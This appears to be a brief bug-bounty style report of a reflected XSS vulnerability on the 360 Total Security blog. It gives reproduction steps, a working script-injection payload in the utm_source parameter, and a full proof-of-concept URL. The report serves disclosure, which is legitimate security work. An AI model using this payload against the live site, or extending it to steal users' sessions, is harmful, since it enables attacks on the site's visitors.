i have found vulnerability in 360totalsecurity ,is Reflected XSS in https://blog.360totalsecurity.com
Steps to reproduce :
Go to https://blog.360totalsecurity.com
and replace utm_source value by this XSS payload : x”><svG onLoad=prompt(document.domain)>
Line: <a href=”https://blog.360totalsecurity.com/en?utm_source=x“><svG onLoad=prompt(document.domain)>
Poc:
https://blog.360totalsecurity.com/en/safe-tips-for-wannacry-ransomware-attack/?utm_campaign=WannaCry_tips&utm_content=360.NSA.defense.tool&utm_medium=text_link&utm_source=x“><svG onLoad=prompt(document.domain)>
Regards,
TAHA